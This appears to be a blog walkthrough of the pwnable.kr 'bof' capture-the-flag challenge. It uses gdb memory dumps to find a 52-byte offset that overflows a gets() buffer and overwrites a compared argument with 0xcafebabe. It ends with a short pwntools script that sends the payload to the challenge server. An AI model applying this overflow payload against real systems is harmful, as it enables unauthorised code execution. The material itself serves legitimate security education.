So, for those of you who don’t know pwnable.kr by now, it’s a CTF website, providing different level challenges including Reverse Engineering, Buffer Overflow exploitations, Shellshock, and basically everything that is Security Research.
So once again we are diving right into our challenge, this time the bof challenge, and once again we are starting right from the first prompt.
Let’s have a look at the bof.c file
It’s not a lot of code, so take a moment to soak it in.
First thing that pops to mind is that // smash me! part which is indeed a hint to where the buffer overflow weakness in the code is.
As can be seen from it’s man page the gets function is dangerous and should not be used.
So we will generate some spam using python
python2.7 -c "print '\x88' * 400" > /tmp/pand we will use gdb to break at the cmp instruction, so we can mess around with memory.
→ 0x5655564b <func+62> cmp DWORD PTR [ebp+0x8], 0xcafebabe
We run the code with our input gef➤ run < /tmp/p and we immediately see a snapshot of the memory:
0x00007fffffffdd90│+0x0000: 0x0000000000000009 ← $rsp
0x00007fffffffdd98│+0x0008: 0xdeadbeeff7dd7660
0x00007fffffffdda0│+0x0010: 0x8888888888888888 ← $rax
0x00007fffffffdda8│+0x0018: 0x8888888888888888
0x00007fffffffddb0│+0x0020: 0x8888888888888888
0x00007fffffffddb8│+0x0028: 0x8888888888888888
0x00007fffffffddc0│+0x0030: 0x8888888888888888
0x00007fffffffddc8│+0x0038: 0x8888888888888888Obviously (assuming you read the code) we need to make this 0xdeafbeef be equal to 0xcafebabe, and we are writing our values just after it.
When we look at the cmp instruction cmp DWORD PTR [ebp+0x8], 0xcafebabe, we notice it compares at ebp+0x8 , so let’s examine that location in memory:
gef➤ p $ebp+0x8
$2 = (void *) 0xffffcfb0
gef➤ x/20x $2
0xffffcfb0: 0x88888888 0x88888888 0x88888888 0x88888888
0xffffcfc0: 0x88888888 0x88888888 0x88888888 0x88888888
0xffffcfd0: 0x88888888 0x88888888 0x88888888 0x88888888
0xffffcfe0: 0x88888888 0x88888888 0x88888888 0x88888888
0xffffcff0: 0x88888888 0x88888888 0x88888888 0x88888888
gef➤It’s all filled with the \x88 from our python script, so let’s try less values and see where we end up.
We will use python2.7 -c “print ‘\x88’ * 15” > /tmp/p and once again we break on 0x5655564b. Now we examine the stack, using x/50wx $esp :
gef➤ x/50wx $esp
0xffffcf70: 0xffffcfc0 0x00000000 0x00000000 0x88888888
0xffffcf80: 0x88888888 0x88888888 0x00888888 0xf7fb9748
0xffffcf90: 0xf7fb6000 0xf7fb6000 0x00000000 0xb9670e00
0xffffcfa0: 0xf7fb63fc 0x00000000 0xffffcfc8 0x565556b9
0xffffcfb0: 0xdeadbeef 0xffffd074 0xffffd07c 0x565556a7
0xffffcfc0: 0xf7fe59b0 0xffffcfe0 0x00000000 0xf7df9e81
0xffffcfd0: 0xf7fb6000 0xf7fb6000 0x00000000 0xf7df9e81
0xffffcfe0: 0x00000001 0xffffd074 0xffffd07c 0xffffd004
0xffffcff0: 0x00000001 0xffffd074 0xf7fb6000 0xf7fe575a
0xffffd000: 0xffffd070 0x00000000 0xf7fb6000 0x00000000
0xffffd010: 0x00000000 0xcb206af8 0x8b832ce8 0x00000000
0xffffd020: 0x00000000 0x00000000 0x00000040 0xf7ffd024
0xffffd030: 0x00000000 0x00000000So in order to overwrite the argument 0xdeafbeef, we will need to write:
(1 + 4 *3)*4 = 52 Bytes, and then our 0xcafebabe
(We have 3 lines of 4 dwords + another dword which is the first bolded one, each dword is 4 bytes long).
Let’s create a Python script that does so:
python2.7 -c “print ‘\xff’ * 52 + ‘\xbe\xba\xfe\xca’” > /tmp/p
And try it:
It seems like we successfully wrote cafebabe to our target memory location, so this should be it, right?
So we write a little script:
from pwn import *conn = remote("pwnable.kr", 9000)payload = 'A' * 52 + '\xbe\xba\xfe\xca'conn.sendline(payload)conn.interactive()
And there we have it:
That’s it! We found the flag! I hope you enjoyed reading this walkthrough of a simple yet beautiful buffer overflow attack, and I hope, as always, that this has inspired you to try and solve some CTFs for yourself! :-)
